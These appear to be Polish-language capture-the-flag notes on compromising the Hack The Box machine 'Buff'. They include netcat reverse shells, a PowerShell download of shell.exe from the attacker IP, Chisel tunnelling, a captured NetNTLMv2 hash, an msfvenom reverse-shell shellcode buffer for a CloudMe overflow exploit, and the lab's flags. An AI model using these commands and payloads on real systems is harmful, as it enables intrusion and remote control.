Buff - 23.08.2021
NMap
Strona główna
Gym Management Software 1.0
Searchsploit
┌──(kali㉿kali)-[~/htb/buff]
└─$ searchsploit gym
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Reverse shell
nc.exe 10.10.14.20 9010 -e cmd.exe ATAKOWANY
rlwrap nc -lvnp 9010 KALI
user.txt
f04db2c70240ebcf1019bd7734babd24
Privilege Escalation
systeminfo
systeminfo
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 23/08/2021, 10:17:48
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,482 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,670 MB
Virtual Memory: In Use: 2,129 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::493d:61ad:c517:c5e4
[03]: dead:beef::e024:6789:7e5e:1e93
[04]: dead:beef::54a:8bbc:8ebf:c03b
[05]: dead:beef::493d:61ad:c517:c5e4
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
python 48506.py http://10.10.10.198:8080/
nc.exe 10.10.14.20 9010 -e cmd.exe
WinPEAS
Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: shaun::BUFF:1122334455667788:6e2756fbb3d748e7c484c39f3443a79d:0101000000000000af16af8fd898d7016a225ae50aaf05eb0000000008003000300000000000000000000000002000008751ec7975c33ca4c304e0296f3cfb421f1d41f54d2cf55b5981ed29cb7ee4b10a0
0100000000000000000000000000000000000090000000000000000000000
Pobranie plików z poziomu cmd.exe
powershell -Command "Invoke-WebRequest -Uri 'http://10.10.14.20/shell.exe' -OutFile 'C:\xampp\htdocs\gym\upload\shell.exe'"
Msfvenom nie zadziałał
Zawartość folderu Documents
Zawartość folderu Downloads
Tasklist
Na Boxie działa proces CloudMe.exe CloudMe działa na porcie 8888, co można sprawdzić netstatem
netstat -an | findstr 127.0.0.1
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING
Searchsploit
Exploit ma taką strukturę
Można nadpisać payload w środku na coś innego
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
Port Forward
Najpierw trzeba przekierować porty, CloudMe na porcie 8888 działa tylko lokalnie, za pomocą plink.exe przekierujemy port 8888 na naszą maszynę.
plink.exe -l kali -pw kali 10.10.14.20 -R 8888:127.0.0.1:8888
lub
plink.exe -R 8888:127.0.0.1:8888 -P 4222 kali@10.10.14.20
Plink.exe nie działał, ostatecznie sprawę rozwiązał Chisel
Przekierowanie portu 3306 (mysql) oraz 8888(cloudme)
chisel server --reverse --port 9002 NA KALI
chisel.exe client 10.10.14.20:9002 R:3306:localhost:3306 R:8888:localhost:8888 NA BOXIE
Sprawdzenie
netstat -na | grep -i 8888
Działa
MsfVenom
Użyjemy takiego payloada
msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -b '\x00\x0A\x0D' -f python
Payload! Ważny jest _
zamiast /
, jest tak ponieważ ten ze slashem byłby do meterpretera.
buf = b""
buf += b"\xbb\x12\xf5\xf7\xc5\xda\xdb\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x0e\x03\x48\xfb\x15"
buf += b"\x30\x90\xeb\x58\xbb\x68\xec\x3c\x35\x8d\xdd\x7c\x21"
buf += b"\xc6\x4e\x4d\x21\x8a\x62\x26\x67\x3e\xf0\x4a\xa0\x31"
buf += b"\xb1\xe1\x96\x7c\x42\x59\xea\x1f\xc0\xa0\x3f\xff\xf9"
buf += b"\x6a\x32\xfe\x3e\x96\xbf\x52\x96\xdc\x12\x42\x93\xa9"
buf += b"\xae\xe9\xef\x3c\xb7\x0e\xa7\x3f\x96\x81\xb3\x19\x38"
buf += b"\x20\x17\x12\x71\x3a\x74\x1f\xcb\xb1\x4e\xeb\xca\x13"
buf += b"\x9f\x14\x60\x5a\x2f\xe7\x78\x9b\x88\x18\x0f\xd5\xea"
buf += b"\xa5\x08\x22\x90\x71\x9c\xb0\x32\xf1\x06\x1c\xc2\xd6"
buf += b"\xd1\xd7\xc8\x93\x96\xbf\xcc\x22\x7a\xb4\xe9\xaf\x7d"
buf += b"\x1a\x78\xeb\x59\xbe\x20\xaf\xc0\xe7\x8c\x1e\xfc\xf7"
buf += b"\x6e\xfe\x58\x7c\x82\xeb\xd0\xdf\xcb\xd8\xd8\xdf\x0b"
buf += b"\x77\x6a\xac\x39\xd8\xc0\x3a\x72\x91\xce\xbd\x75\x88"
buf += b"\xb7\x51\x88\x33\xc8\x78\x4f\x67\x98\x12\x66\x08\x73"
buf += b"\xe2\x87\xdd\xd4\xb2\x27\x8e\x94\x62\x88\x7e\x7d\x68"
buf += b"\x07\xa0\x9d\x93\xcd\xc9\x34\x6e\x86\xff\xc2\x7e\x42"
buf += b"\x68\xd1\x7e\x49\x41\x5c\x98\xe7\x81\x08\x33\x90\x38"
buf += b"\x11\xcf\x01\xc4\x8f\xaa\x02\x4e\x3c\x4b\xcc\xa7\x49"
buf += b"\x5f\xb9\x47\x04\x3d\x6c\x57\xb2\x29\xf2\xca\x59\xa9"
buf += b"\x7d\xf7\xf5\xfe\x2a\xc9\x0f\x6a\xc7\x70\xa6\x88\x1a"
buf += b"\xe4\x81\x08\xc1\xd5\x0c\x91\x84\x62\x2b\x81\x50\x6a"
buf += b"\x77\xf5\x0c\x3d\x21\xa3\xea\x97\x83\x1d\xa5\x44\x4a"
buf += b"\xc9\x30\xa7\x4d\x8f\x3c\xe2\x3b\x6f\x8c\x5b\x7a\x90"
buf += b"\x21\x0c\x8a\xe9\x5f\xac\x75\x20\xe4\xdc\x3f\x68\x4d"
buf += b"\x75\xe6\xf9\xcf\x18\x19\xd4\x0c\x25\x9a\xdc\xec\xd2"
buf += b"\x82\x95\xe9\x9f\x04\x46\x80\xb0\xe0\x68\x37\xb0\x20"
Wklejamy to do exploita
rlwrap nc -lvnp 9001 NASŁUCHIWANIE
python3 48389.py WYWOŁANIE EXPLOITA
root.txt
5760db8b9792445e42d55ee110f4fbbb